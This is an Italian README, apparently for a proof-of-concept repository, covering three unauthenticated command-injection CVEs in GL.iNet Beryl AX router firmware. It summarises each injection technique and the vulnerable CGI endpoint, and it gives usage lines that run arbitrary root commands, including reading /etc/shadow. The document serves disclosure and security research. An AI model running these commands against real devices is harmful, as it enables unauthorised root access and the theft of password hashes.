
PoC per tre vulnerabilità di command injection non autenticate (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) nel firmware <= 4.4.5 del router da viaggio GL.iNet GL-MT3000 (Beryl AX).
Analisi completa: https://www.hunt-benito.com/blog/glinet-beryl-ax-triple-rce-cve-2026-11450-11451-11452-unauthenticated-root-on-travel-router/
| CVE | CVSS | Tecnica |
|---|---|---|
| CVE-2026-11450 | 7.3 | Il disallineamento delle dimensioni del buffer (0x40 vs 0x100) aggira il controllo di access(); $() viene iniettato tramite system() |
| CVE-2026-11451 | 7.3 | L'escape dell'apice singolo nel parametro FTP media_dir rompe il quoting della shell |
| CVE-2026-11452 | 7.3 | La sostituzione di comando $() nel parametro password di Samba all'interno di printf tra doppi apici |
Tutte e tre sfruttano il dispatcher CGI non autenticato /cgi-bin/glc che carica i plugin tramite dlopen/dlsym senza autenticazione né allowlist dei metodi.
# Exploit all three CVEs
python3 poc.py http://192.168.8.1
# Exploit a specific CVE
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# Custom command and output file
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
Solo per scopi educativi e di ricerca sulla sicurezza autorizzata. Non utilizzare contro sistemi di cui non sei proprietario o per cui non hai esplicita autorizzazione ai test.